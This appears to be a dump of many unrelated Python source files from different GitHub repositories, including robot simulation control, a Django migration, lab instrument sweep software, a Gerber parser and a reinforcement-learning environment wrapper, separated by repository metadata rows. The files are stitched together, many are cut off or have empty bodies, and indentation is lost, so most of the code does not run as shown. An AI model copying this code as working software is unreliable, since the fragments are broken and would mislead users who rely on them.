from nav_msgs.msg import Odometry
import time
from tool.mecanum_utils import *
roslib.load_manifest('mecanum_robot_gazebo')
def ball_catch_check(mecanum, ball_name, left_score, right_score, away_mecanum):
meg = False
g_get_state = rospy.ServiceProxy("/gazebo/get_model_state", GetModelState)
ball_state = g_get_state(model_name = ball_name)
mecanum.get_position()
ball_x = ball_state.pose.position.x
ball_y = ball_state.pose.position.y
ball_z = ball_state.pose.position.z
robot_x = mecanum.object_pose.position.x
robot_y = mecanum.object_pose.position.y
robot_z = mecanum.object_pose.position.z
distance = np.sqrt((robot_x - ball_x)**2 + (robot_y - ball_y)**2 + (robot_z - ball_z)**2)
distance_x = abs(ball_x - robot_x)
distance_y = abs(ball_y - robot_y)
distance_z = abs(ball_z - robot_z)
"""print("--------------------------------------------------")
print("\tdistance_x :",distance_x)
print("\tdistance_y :",distance_y)
print("\tdistance_z :",distance_z)
"""
if abs(ball_x) > 15:
left_score, right_score = score_board(left_score, right_score, ball_name)
print("--------------------------------------------------")
print("\tvelocity :", away_mecanum.v)
print("\tangle :", away_mecanum.launch_angle)
pass
if (distance_x < 0.6 and distance_y <0.6 and distance_z < 1) or abs(ball_x) > 15:
mecanum.del_ball()
meg = True
return left_score, right_score, meg,
return left_score, right_score, meg
def return_home(home_mecanum):
home_mecanum.get_position()
robot_x = home_mecanum.object_pose.position.x
robot_y = home_mecanum.object_pose.position.y
robot_z = home_mecanum.object_pose.position.z
robot_angle = np.rad2deg(home_mecanum.angle[2])
if robot_x < 0:
x_error = -11 - robot_x
y_error = -robot_y
home_mecanum.twist.angular.z = -robot_angle/100
if robot_x > 0:
x_error = robot_x - 11
y_error = robot_y
if robot_angle > 0 :
home_mecanum.twist.angular.z = (180 - robot_angle)/100
else:
home_mecanum.twist.angular.z = -(180 + robot_angle)/100
vel_forward_apply, vel_lateral_apply = home_mecanum.check_velocity(home_mecanum.vel_forward * (x_error*0.5),
home_mecanum.vel_lateral * (y_error*0.5))
home_mecanum.twist.linear.x = vel_forward_apply
home_mecanum.twist.linear.y = vel_lateral_apply
home_mecanum.twist.linear.z = 0
home_mecanum.wheel_vel = mecanum_wheel_velocity(home_mecanum.twist.linear.x, home_mecanum.twist.linear.y, home_mecanum.twist.angular.z)
home_mecanum.pub.publish(home_mecanum.twist)
home_mecanum.pub_wheel_vel_1.publish(home_mecanum.wheel_vel[0,:])
home_mecanum.pub_wheel_vel_2.publish(home_mecanum.wheel_vel[1,:])
home_mecanum.pub_wheel_vel_3.publish(home_mecanum.wheel_vel[2,:])
home_mecanum.pub_wheel_vel_4.publish(home_mecanum.wheel_vel[3,:])
if abs(x_error) <0.1 and abs(y_error)< 0.1 :
home_mecanum.stop()
| 35.558541 | 191 | 0.596837 |
6208cb2a2c64c71c60c631414ac312652b301b34 | 21,926 | py | Python | kirbyClass.py | mattuff/KirbyCalculus | f2a2d2839cd5a658e5e82430619f43dfa6a65502 | [
"MIT"
] | 1 | 2022-03-11T07:45:02.000Z | 2022-03-11T07:45:02.000Z | kirbyClass.py | mattuff/KirbyCalculus | f2a2d2839cd5a658e5e82430619f43dfa6a65502 | [
"MIT"
] | null | null | null | kirbyClass.py | mattuff/KirbyCalculus | f2a2d2839cd5a658e5e82430619f43dfa6a65502 | [
"MIT"
] | null | null | null | from crossingClass import *
from joinClass import *
from strandClass import *
from componentClass import *
| 32.434911 | 144 | 0.528505 |
62098ed13ce2805c2274aa650c177f0c748ff79f | 401 | py | Python | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 10 | 2018-05-13T18:01:57.000Z | 2018-12-23T17:11:14.000Z | projects/migrations/0017_project_status_isvalidated.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 88 | 2018-05-04T15:33:46.000Z | 2022-03-08T21:09:21.000Z | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 7 | 2018-05-08T16:05:06.000Z | 2018-09-13T05:49:05.000Z | # Generated by Django 2.0.3 on 2018-03-26 01:17
from django.db import migrations, models
| 21.105263 | 53 | 0.613466 |
6209f7fa8b911f0682b7e6cecc7dc9fe96d9e302 | 1,177 | py | Python | ps1/ps1_3.py | collin-li/mitx-6.00.1x | 7fb111586c6b82e205e86fadfb4d91d09de46808 | [
"MIT"
] | null | null | null | ps1/ps1_3.py | collin-li/mitx-6.00.1x | 7fb111586c6b82e205e86fadfb4d91d09de46808 | [
"MIT"
] | 1 | 2017-02-06T02:46:08.000Z | 2017-02-06T02:46:08.000Z | ps1/ps1_3.py | collin-li/mitx-6.00.1x | 7fb111586c6b82e205e86fadfb4d91d09de46808 | [
"MIT"
] | null | null | null | # PROBLEM
#
# Assume s is a string of lower case characters.
#
# Write a program that prints the longest substring of s in which the letters
# occur in alphabetical order. For example, if s = 'azcbobobegghakl', then your
# program should print:
#
# 'Longest substring in alphabetical order is: beggh'
#
# In case of ties, print the first substring. For example, if s = 'abcbcd',
# then your program should print:
#
# 'Longest substring in alphabetical order is: abc'
# For test purposes
s = 'azcbobobegghakl'
# SOLUTION
if len(s) > 1:
substring = s[0]
length = 1
# Store initial solution
bestsubstring = substring
bestlength = length
for num in range(len(s)-1): # Last letter is checked by 2nd-last letter
if s[num] <= s[num+1]:
substring = substring + s[num+1]
length += 1
if length > bestlength:
bestsubstring = substring
bestlength = length
else: # Reset substring and length
substring = s[num+1]
length = 1
else:
bestsubstring = s
print ('Longest substring in alphabetical order is: ' + bestsubstring)
| 26.155556 | 80 | 0.626168 |
620afd69fe7804f73854cad5c0dd48effc58af61 | 992 | py | Python | bib2web/mandatory_fields.py | Juvawa/bib2web | 8d6c2244e46eefee1a519f8b3b656a143aa8bd9e | [
"MIT"
] | null | null | null | bib2web/mandatory_fields.py | Juvawa/bib2web | 8d6c2244e46eefee1a519f8b3b656a143aa8bd9e | [
"MIT"
] | null | null | null | bib2web/mandatory_fields.py | Juvawa/bib2web | 8d6c2244e46eefee1a519f8b3b656a143aa8bd9e | [
"MIT"
] | null | null | null | mandatory = \
{
'article' : ['ENTRYTYPE', 'ID', 'author', 'title', 'journal', 'year', 'volume'],
'book' : ['ENTRYTYPE', 'ID', 'title', 'publisher', 'year'],
'booklet' : ['ENTRYTYPE', 'ID', 'title', 'year'],
'conference' : ['ENTRYTYPE', 'ID', 'author', 'title', 'booktitle', 'publisher', 'year'],
'inbook' : ['ENTRYTYPE', 'ID', 'title', 'publisher', 'year'],
'incollection' : ['ENTRYTYPE', 'ID', 'author', 'title', 'booktitle', 'publisher', 'year'],
'inproceedings' : ['ENTRYTYPE', 'ID', 'author', 'title', 'booktitle', 'year'],
'manual' : ['ENTRYTYPE', 'ID', 'title', 'year'],
'mastersthesis' : ['ENTRYTYPE', 'ID', 'author', 'title', 'school', 'year'],
'misc' : ['ENTRYTYPE', 'ID', 'title', 'year'],
'phdthesis' : ['ENTRYTYPE', 'ID', 'author', 'title', 'school', 'year'],
'proceedings' : ['ENTRYTYPE', 'ID', 'title', 'year'],
'techreport' : ['ENTRYTYPE', 'ID', 'author', 'title', 'institution', 'year'],
'unpublished' : ['ENTRYTYPE', 'ID', 'author', 'title', 'note']
} | 58.352941 | 91 | 0.563508 |
620c76cdf8b6c6cb6855109a069ebc57b866672e | 6,809 | py | Python | trainAndTest/processOneFold_sm.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | 5 | 2020-01-21T21:11:49.000Z | 2022-02-06T19:55:28.000Z | trainAndTest/processOneFold_sm.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | null | null | null | trainAndTest/processOneFold_sm.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | 3 | 2018-05-25T14:57:36.000Z | 2022-01-27T12:53:41.000Z | from __future__ import print_function
import itertools
import sys, os
import inspect
import numpy as np
from joblib import load as joblib_load
from .resultsManager import ResultsManager
#from .classifiers.randomForest import trainMethod, predictMethod
from .classifiers.xgBoost import trainMethod, predictMethod
def getDataForTestFromPrefix( testPrefix, testPath ):
'''
Load a data file whose name startswith testPrefix and it is contained in testPath.
Returns a tuple with all data needed to perform predictions and testing
:param prefix: str. The prefix of the filename to be loaded. E.g. "1A2K"
:param filesPath: str. The path where data files are contained
:return (data_d, data_t, ppiComplex.getLabels(), ppiComplex.getIds())
data_d: np.array (n,m). A np.array that can be feed to the classifier. Each row represents
a pair of amino acids in direct form (first ligand aa second receptor aa)
data_l: np.array (n,m). A np.array that can be feed to the classifier. Each row represents
a pair of amino acids in transpose form (first receptor aa second ligand aa)
ppiComplex.getLabels(): np.array which contains the labels (-1, 1 ) of each row (pair of amino acids)
ppiComplex.getIds(): pandas.DataFrame whose columns are:
chainIdL resIdL resNameL chainIdR resIdR resNameR categ
'''
for fname in sorted(os.listdir(testPath)):
if fname.startswith(testPrefix):
ppiComplex= joblib_load(os.path.join(testPath, fname) )
data_d,data_t= ppiComplex.getData()
return (data_d, data_t, ppiComplex.getLabels(), ppiComplex.getIds())
def getDataForClassifierFromComplexes(listOfComplexes):
'''
Extracts the needed information to train a classifier from a list of codified complexes
(codifyComplexes.ComplexCodified.ComplexCodified).
:param listOfComplexes: [codifyComplexes.ComplexCodified.ComplexCodified]. The complex codified that will be used for
training
:return (dataDir,dataTrans, labels)
dataDir: np.array (n,m). A np.array that can be feed to the classifier. Each row represents
a pair of amino acids in direct form (first ligand aa second receptor aa)
dataTrans: np.array (n,m). A np.array that can be feed to the classifier. Each row represents
a pair of amino acids in transpose form (first receptor aa second ligand aa)
labels: np.array which contains the labels (-1, 1 ) of each row (pair of amino acids)
'''
dataDir= []
dataTrans= []
labels= []
prefixes= []
complexesNumId=[]
if not isinstance(listOfComplexes, list) and not isinstance(listOfComplexes, tuple):
listOfComplexes= [listOfComplexes]
for complexNum, ppiComplex in enumerate(listOfComplexes):
if not inspect.isgenerator(ppiComplex):
ppiComplex= [ppiComplex]
for dataBatch in ppiComplex: #In case ppiComplex is an iterator of chunks
data_d,data_t= dataBatch.getData()
dataDir.append( data_d)
dataTrans.append( data_t)
labels.append( dataBatch.getLabels())
prefixes.append(dataBatch.getPrefix())
complexesNumId+= [complexNum]* data_d.shape[0]
# print(dataBatch.prefix, np.max(data_d),np.max(data_t))
dataDir= np.concatenate(dataDir)
dataTrans= np.concatenate(dataTrans)
labels= np.concatenate(labels)
return dataDir,dataTrans, labels, complexesNumId
def trainAndTestOneFold(trainData, testPrefixes, testPath, outputPath, verbose=False, ncpu= 1):
'''
Trains and tests one fold
:param trainData: a numpy array for training with first column labels and the others features
:param testPrefixes: str[]. A list that contains prefixes for all complexes to be tested
:param testPath: str. Path to a dir where testing data files are stored
:param outputPath: str. Path to a dir where predictions will be stored
:param verbose: boolean. Whether or not print to stdout info
:param ncpu: int. Number of cpu's to use in parallel
'''
resultsForEvaluation_list= []
testPrefixesNotEvaluated=[]
finalResults=[]
for testPrefix in testPrefixes:
if outputPath is not None:
outName= os.path.join( outputPath, testPrefix+".res.tab")
if verbose and os.path.isfile(outName):
print("Complex already computed: %s"%(outName))
resultsForEvaluation_list.append( (testPrefix, ResultsManager.loadExistingResults(outName) ) )
else:
testPrefixesNotEvaluated.append( testPrefix )
else:
testPrefixesNotEvaluated.append( testPrefix )
modelo=None
if len(testPrefixesNotEvaluated)> 0 or len(testPrefixes)==0:
if verbose:
print("Testing:", testPrefixesNotEvaluated)
print("Training classifier")
verboseLevel=1
else:
verboseLevel=0
# dataDir,dataTrans, labels, __ = getDataForClassifierFromComplexes(trainComplexes)
# trainData= np.concatenate([dataDir,dataTrans])
# trainLabels= np.concatenate([labels,labels])
# dataDir,dataTrans, labels = (None, None, None)
# trainLabels, trainData= trainData[:, 0]
modelo= trainMethod(trainData[:, 1:], trainData[:, 0], verboseLevel= verboseLevel, ncpu= ncpu)
if verbose==True: print ("Classifier fitted.")
for testPrefix in testPrefixesNotEvaluated:
prob_predictionsDir_list= []
prob_predictionsTrans_list=[]
testlabels_list=[]
testPairsIds_list=[]
if verbose==True: print("Computing predictions for %s"%(testPrefix))
testDataDirect, testDataTrans, testlabels, testPairsIds= getDataForTestFromPrefix( testPrefix, testPath )
prob_predictionsDir= predictMethod(modelo, testDataDirect)
prob_predictionsTrans= predictMethod(modelo,testDataTrans)
resultEval= ResultsManager(testPrefix, prob_predictionsDir, prob_predictionsTrans, testPairsIds)
if verbose==True: print("Evaluating predictions of %s"%(testPrefix))
resultEval.getFullEvaluation()
if verbose==True: print(resultEval)
## raw_input("press enter")
finalResults.append( resultEval )
if not outputPath is None:
outName= os.path.join(outputPath, testPrefix+".res.tab")
if not os.path.isfile(outName):
if verbose==True: print("Saving results at %s"%(outName))
resultEval.writeResults(outName)
for testPrefix, resultEval in resultsForEvaluation_list:
if verbose==True: print("Evaluating predictions for %s"%(testPrefix))
resultEval.getFullEvaluation()
if verbose==True: print(resultEval)
finalResults.append( resultEval )
return finalResults, modelo
| 46.636986 | 122 | 0.697606 |
620d0e354faec7f287cbe008e0fab6e397c53f56 | 7,289 | py | Python | manila_tempest_tests/tests/api/admin/test_snapshot_export_locations_negative.py | openstack/manila-tempest-plugin | 9c4a97b150e15b814acd4feb4da858a0eeff881e | [
"Apache-2.0"
] | 9 | 2017-10-31T10:36:34.000Z | 2020-10-07T01:31:38.000Z | manila_tempest_tests/tests/api/admin/test_snapshot_export_locations_negative.py | openstack/manila-tempest-plugin | 9c4a97b150e15b814acd4feb4da858a0eeff881e | [
"Apache-2.0"
] | null | null | null | manila_tempest_tests/tests/api/admin/test_snapshot_export_locations_negative.py | openstack/manila-tempest-plugin | 9c4a97b150e15b814acd4feb4da858a0eeff881e | [
"Apache-2.0"
] | 4 | 2018-07-19T13:55:51.000Z | 2021-11-05T17:50:27.000Z | # Copyright (c) 2017 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import config
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from testtools import testcase as tc
from manila_tempest_tests.tests.api import base
from manila_tempest_tests import utils
CONF = config.CONF
| 41.651429 | 79 | 0.69255 |
620d308ec14780c98f6cbb15fbaefde43dfb9edb | 6,614 | py | Python | gateway/spvtable.py | trinity-project/trinity | 081eba1d4294a3bed33ba18c3f7b862b8803ee22 | [
"MIT"
] | 60 | 2018-01-12T07:33:15.000Z | 2021-12-28T23:06:28.000Z | gateway/spvtable.py | trinity-project/trinity | 081eba1d4294a3bed33ba18c3f7b862b8803ee22 | [
"MIT"
] | 13 | 2018-01-23T00:14:35.000Z | 2020-04-23T00:03:31.000Z | gateway/spvtable.py | trinity-project/trinity | 081eba1d4294a3bed33ba18c3f7b862b8803ee22 | [
"MIT"
] | 13 | 2018-01-05T07:27:29.000Z | 2021-01-06T16:45:05.000Z | """Author: Trinity Core Team
MIT License
Copyright (c) 2018 Trinity
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
import json
import copy
from treelib import Node, Tree
from treelib.exceptions import DuplicatedNodeIdError
import re
def sync_tree(self, peer_tree):
"""
get all peers node id\n
traversal all peers \n
deep copy current tree get the new_tree\n
make child as the new_tree root\n
:param peer_tree:
:return:
"""
copy_peer_tree = copy.deepcopy(peer_tree)
# if contains each other
for self_nid in self.nodes.keys():
if copy_peer_tree.contains(self_nid) and self_nid != peer_tree.root:
copy_peer_tree.remove_node(self_nid)
if self.contains(peer_tree.root):
self.remove_node(peer_tree.root)
# print(peer_tree.to_dict(with_data=True))
self.paste(self.root, copy_peer_tree)
class WalletSet(object):
class SPVHashTable(object):
"""
Description: use the dictionary to hash the spv table with wallet node address
"""
hash_instance = None
def find_keys(self, spv_key):
"""
:param spv_key: The public key string of the spv\n
:return: list type. [wallet-1-public-key , wallet-2-public-key, ...]
"""
keys = []
for key in self.maps:
if spv_key in self.find(key):
keys.append(key)
return keys
def find(self, key):
"""
:param key: The public key string of the wallet\n
:return: list type. [spv-1-public-key , spv-2-public-key, ...]
"""
return self.maps.get(key)
def add(self, key, value):
"""
:param key: The public key string of the wallet
:param value: the public key of the spv
:return:
"""
if key not in self.maps.keys():
self.maps.update({key:[value]})
else:
self.maps[key].append(value)
# elif value not in self.maps.get(key):
# self.maps[key].append(value)
def remove(self, key, value):
"""
:param key: The public key string of the wallet
:param value: the public key of the spv
:return:
"""
if key in self.maps.keys():
spv_list = self.maps[key]
if value in spv_list:
spv_list.remove(value)
def sync_table(self, hash_table):
"""
:param hash_table: json or dict type
:return:
"""
if isinstance(hash_table, str):
# decoder
hash_table = self.to_dict(hash_table)
if not hash_table:
return
for key in hash_table:
if key in self.maps:
self.maps[key].extend(hash_table[key])
self.maps[key] = list(set(self.maps[key]))
else:
self.maps[key] = hash_table[key]
| 29.659193 | 91 | 0.580738 |
620eed4cbd2619972703ee779c16c8a7ab6c7ba9 | 54 | py | Python | src/apps/startposes/models/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 27 | 2020-05-03T11:01:27.000Z | 2022-03-17T05:33:10.000Z | src/apps/startposes/models/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 54 | 2020-05-09T01:18:41.000Z | 2022-01-22T10:31:15.000Z | src/apps/startposes/models/__init__.py | sanderland/katago-server | 6414fab080d007c05068a06ff4f25907b92848bd | [
"MIT"
] | 9 | 2020-09-29T11:31:32.000Z | 2022-03-09T01:37:50.000Z | from .startpos import StartPos, StartPosCumWeightOnly
| 27 | 53 | 0.87037 |
620fe82f37b4b5c4aa7773e3305715688885bc0e | 8,342 | py | Python | python/chronos/test/bigdl/chronos/autots/test_tspipeline.py | joan726/BigDL | 2432f420418c8ccf02325f8677c94f291e112053 | [
"Apache-2.0"
] | 3 | 2021-07-14T01:28:47.000Z | 2022-03-02T01:16:32.000Z | python/chronos/test/bigdl/chronos/autots/test_tspipeline.py | liangs6212/BigDL | 3c89ff7e8bbdc713110536c18099506811cd2b3a | [
"Apache-2.0"
] | null | null | null | python/chronos/test/bigdl/chronos/autots/test_tspipeline.py | liangs6212/BigDL | 3c89ff7e8bbdc713110536c18099506811cd2b3a | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import tempfile
from unittest import TestCase
import pytest
import torch
from torch.utils.data import TensorDataset, DataLoader
from bigdl.chronos.autots import AutoTSEstimator, TSPipeline
from bigdl.orca.common import init_orca_context, stop_orca_context
if __name__ == "__main__":
pytest.main([__file__])
| 44.849462 | 90 | 0.532846 |
62112ee54eed681ca29c3d8ae3b4bec88531086a | 42,076 | py | Python | src/app/QKeithleySweep.py | mwchalmers/QKeithleyControl | 94e85cd8bc42d54f2cef4d0cfdb3ee4b62bcba41 | [
"MIT"
] | 6 | 2020-06-18T18:42:24.000Z | 2022-01-26T06:21:13.000Z | src/app/QKeithleySweep.py | mwchalmers/QKeithleyControl | 94e85cd8bc42d54f2cef4d0cfdb3ee4b62bcba41 | [
"MIT"
] | 1 | 2021-12-23T11:12:17.000Z | 2021-12-23T11:12:17.000Z | src/app/QKeithleySweep.py | mwchalmers/QKeithleyControl | 94e85cd8bc42d54f2cef4d0cfdb3ee4b62bcba41 | [
"MIT"
] | 3 | 2019-12-24T20:43:23.000Z | 2021-08-29T13:48:17.000Z | # ---------------------------------------------------------------------------------
# QKeithleySweep -> QVisaApplication
# Copyright (C) 2019 Michael Winters
# github: https://github.com/mesoic
# email: mesoic@protonmail.com
# ---------------------------------------------------------------------------------
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#!/usr/bin/env python
import os
import sys
import time
import threading
# Import numpy
import numpy as np
# Import QVisaApplication
from PyQtVisa import QVisaApplication
# Import PyQtVisa widgets
from PyQtVisa.widgets import QVisaUnitSelector
from PyQtVisa.widgets import QVisaDynamicPlot
# Import QT backends
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtGui import QIcon
# Container class to construct sweep measurement widget
| 30.824908 | 197 | 0.696811 |
62130b375ece64a9c0e907cb577ca9c4c8cd327e | 1,620 | py | Python | tests/fields/test_render.py | jpsca/pforms | 77c9da93e5224e79bb147aa873f28951e972bb21 | [
"MIT"
] | 2 | 2020-09-30T22:41:00.000Z | 2020-12-04T16:47:17.000Z | tests/fields/test_render.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | 2 | 2021-11-18T18:01:28.000Z | 2021-11-18T18:03:29.000Z | tests/fields/test_render.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | null | null | null | import proper_forms.fields as f
| 24.179104 | 75 | 0.588889 |
621340935801ad4caf2565122ba09adde8da7eaf | 30,832 | py | Python | gerber.py | BetaPollux/gerbex | aeb013da642135d28d809ddb07febc129219d297 | [
"MIT"
] | null | null | null | gerber.py | BetaPollux/gerbex | aeb013da642135d28d809ddb07febc129219d297 | [
"MIT"
] | null | null | null | gerber.py | BetaPollux/gerbex | aeb013da642135d28d809ddb07febc129219d297 | [
"MIT"
] | 1 | 2021-12-05T14:44:26.000Z | 2021-12-05T14:44:26.000Z | #!/usr/bin/python3
# RS-274X per standard Revision 2021.02
import re
import copy
import numpy as np
import vertices
# TODO replace all vertices with outline class
# Meant for extracting substrings only
# Cast to int or float will catch invalid strings
RE_INT = r'[+-]?[0-9]+'
RE_DEC = r'[+-]?[0-9\.]+?'
EXPOSURE_ON = 1
EXPOSURE_OFF = 0
# TODO Arc needs quadrant mode
| 35.196347 | 95 | 0.570025 |
621341c710939a44f425e8019b3137c8dfb8ad3f | 3,558 | py | Python | angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 173d3ffa02146956e5f0c9c8862da56988fa67b2 | [
"BSD-2-Clause"
] | 474 | 2015-08-10T17:47:15.000Z | 2022-03-31T21:10:55.000Z | angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 173d3ffa02146956e5f0c9c8862da56988fa67b2 | [
"BSD-2-Clause"
] | 355 | 2015-08-17T09:35:53.000Z | 2022-03-31T21:29:52.000Z | angrmanagement/ui/menus/disasm_insn_context_menu.py | yuzeming/angr-management | 173d3ffa02146956e5f0c9c8862da56988fa67b2 | [
"BSD-2-Clause"
] | 95 | 2015-08-11T14:36:12.000Z | 2022-03-31T23:01:01.000Z | from functools import partial
from typing import Callable
from typing import TYPE_CHECKING
from ...config import Conf
from .menu import Menu, MenuEntry, MenuSeparator
if TYPE_CHECKING:
from ...ui.views.disassembly_view import DisassemblyView
| 36.306122 | 114 | 0.666948 |
621428e35c36b4c6fb3b8e653cb6dee70e33f859 | 2,787 | py | Python | src/panoptes/pocs/base.py | sarumanplaysguitar/POCS | b6c50cb70b8f3fc2147e975e5cd3cd953956da8d | [
"MIT"
] | null | null | null | src/panoptes/pocs/base.py | sarumanplaysguitar/POCS | b6c50cb70b8f3fc2147e975e5cd3cd953956da8d | [
"MIT"
] | null | null | null | src/panoptes/pocs/base.py | sarumanplaysguitar/POCS | b6c50cb70b8f3fc2147e975e5cd3cd953956da8d | [
"MIT"
] | null | null | null | from requests.exceptions import ConnectionError
from panoptes.pocs import __version__
from panoptes.utils.database import PanDB
from panoptes.utils.config import client
from panoptes.pocs.utils.logger import get_logger
from panoptes.pocs import hardware
# Global database.
PAN_DB_OBJ = None
| 35.278481 | 97 | 0.642985 |
62148220d3b68cf5b490d8e272125fd66f2e326e | 12,455 | py | Python | src/metarl/envs/multi_env_wrapper.py | icml2020submission6857/metarl | 9b66cefa2b6bcb6a38096d629ce8853b47c7171d | [
"MIT"
] | 2 | 2020-03-15T14:35:15.000Z | 2021-02-15T16:38:00.000Z | src/metarl/envs/multi_env_wrapper.py | icml2020submission6857/metarl | 9b66cefa2b6bcb6a38096d629ce8853b47c7171d | [
"MIT"
] | null | null | null | src/metarl/envs/multi_env_wrapper.py | icml2020submission6857/metarl | 9b66cefa2b6bcb6a38096d629ce8853b47c7171d | [
"MIT"
] | 1 | 2020-02-24T03:04:23.000Z | 2020-02-24T03:04:23.000Z | """A wrapper env that handles multiple tasks from different envs.
Useful while training multi-task reinforcement learning algorithms.
It provides observations augmented with one-hot representation of tasks.
"""
import random
import akro
import gym
import numpy as np
def round_robin_strategy(num_tasks, last_task=None):
"""A function for sampling tasks in round robin fashion.
Args:
num_tasks (int): Total number of tasks.
last_task (int): Previously sampled task.
Returns:
int: task id.
"""
if last_task is None:
return 0
return (last_task + 1) % num_tasks
def uniform_random_strategy(num_tasks, _):
"""A function for sampling tasks uniformly at random.
Args:
num_tasks (int): Total number of tasks.
_ (object): Ignored by this sampling strategy.
Returns:
int: task id.
"""
return random.randint(0, num_tasks - 1)
def step(self, action):
"""gym.Env step for the active task env.
Args:
action (object): object to be passed in gym.Env.reset(action)
Returns:
object: agent's observation of the current environment
float: amount of reward returned after previous action
bool: whether the episode has ended
dict: contains auxiliary diagnostic information
"""
obs, reward, done, info = self.env.step(action)
obs = self._augment_observation(obs)
oh_obs = self._obs_with_one_hot(obs)
info['task_id'] = self._active_task_index
info['task_name'] = self._envs_names_list[self._active_task_index]
return oh_obs, reward, done, info
def close(self):
"""Close all task envs."""
for env in self._task_envs:
env.close()
def _obs_with_one_hot(self, obs):
"""Concatenate active task one-hot representation with observation.
Args:
obs (numpy.ndarray): observation
Returns:
numpy.ndarray: active task one-hot + observation
"""
oh_obs = np.concatenate([self.active_task_one_hot, obs])
return oh_obs
# """A wrapper env that handles multiple tasks from different envs.
# Useful while training multi-task reinforcement learning algorithms.
# It provides observations augmented with one-hot representation of tasks.
# """
# import random
# import akro
# import gym
# import numpy as np
# def round_robin_strategy(num_tasks, last_task=None):
# """A function for sampling tasks in round robin fashion.
# Args:
# num_tasks (int): Total number of tasks.
# last_task (int): Previously sampled task.
# Returns:
# int: task id.
# """
# if last_task is None:
# return 0
# return (last_task + 1) % num_tasks
# def uniform_random_strategy(num_tasks, _):
# """A function for sampling tasks uniformly at random.
# Args:
# num_tasks (int): Total number of tasks.
# _ (object): Ignored by this sampling strategy.
# Returns:
# int: task id.
# """
# return random.randint(0, num_tasks - 1)
# class MultiEnvWrapper(gym.Wrapper):
# """A wrapper class to handle multiple gym environments.
# Args:
# envs (list(gym.Env)):
# A list of objects implementing gym.Env.
# sample_strategy (function(int, int)):
# Sample strategy to be used when sampling a new task.
# """
# def __init__(self, envs, sample_strategy=uniform_random_strategy):
# self._sample_strategy = sample_strategy
# self._num_tasks = len(envs)
# self._active_task_index = None
# self._observation_space = None
# max_flat_dim = np.prod(envs[0].observation_space.shape)
# max_observation_space_index = 0
# for i, env in enumerate(envs):
# assert len(env.observation_space.shape) == 1
